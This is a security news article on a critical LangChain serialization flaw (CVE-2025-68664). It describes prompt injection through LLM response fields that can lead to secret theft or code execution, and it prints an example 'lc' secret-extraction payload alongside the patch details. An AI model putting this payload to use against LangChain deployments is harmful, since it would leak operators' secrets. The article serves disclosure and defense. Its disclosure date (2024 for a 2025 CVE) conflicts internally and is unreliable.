Critical LangChain Vulnerability Allows Attackers to Steal Sensitive Secrets

Critical LangChain Vulnerability Allows Attackers to Steal Sensitive Secrets

A critical security vulnerability in LangChain, one of the world’s most widely deployed AI frameworks, enables attackers to extract environment variable secrets and, through a serialization injection flaw, potentially achieve code execution.

The vulnerability, identified as CVE-2025-68664, affects the core langchain-core library and was disclosed on December 25, 2024, by security researcher Yarden Porat from Cyata.

Vulnerability Overview

The vulnerability stems from improper handling of serialization functions, dumps(), and dumpd() in langchain-core.

Attribute Details
CVE ID CVE-2025-68664
GHSA ID GHSA-c67j-w6g6-q2cm
CVSS Score 9.3 (Critical)

These functions failed to escape user-controlled dictionaries containing the reserved ‘lc’ key, which LangChain uses internally to mark serialized objects.

When attacker-controlled data includes this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.​

The vulnerability affects applications that use standard LangChain features, including astream_events(version=”v1″), Runnable: astream_log(), RunnableWithMessageHistory, and various caching mechanisms.

The most dangerous attack path involves prompt injection via LLM response fields such as additional_kwargs or response_metadata, which can be serialized and deserialized via standard streaming operations.​

Successful exploitation allows attackers to extract environment variable secrets by injecting structures like {“lc”: 1, “type”: “secret”, “id”: [“ENV_VAR”]} during deserialization when secrets_from_env=True (the previous default setting).

Attackers can also instantiate classes with controlled parameters within trusted namespaces, potentially triggering network calls, file operations, or code execution through Jinja2 template rendering.​

LangChain has released patches in versions 1.2.5 and 0.3.81 that fix the escaping bug and introduce restrictive defaults.

The allowed_objects parameter now defaults to ‘core’ (limiting deserialization to core objects), secrets_from_env changed from True to False, and Jinja2 templates are now blocked by default through a new init_validator parameter.

Most users deserializing standard LangChain types will experience no disruption, but custom implementations may require code adjustments.​

Organizations running LangChain in production should update immediately, as the framework has recorded approximately 847 million total downloads, including 98 million in the last month alone.

LangChain awarded a $4,000 bounty for this finding the maximum ever awarded in the project.​

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.



Source link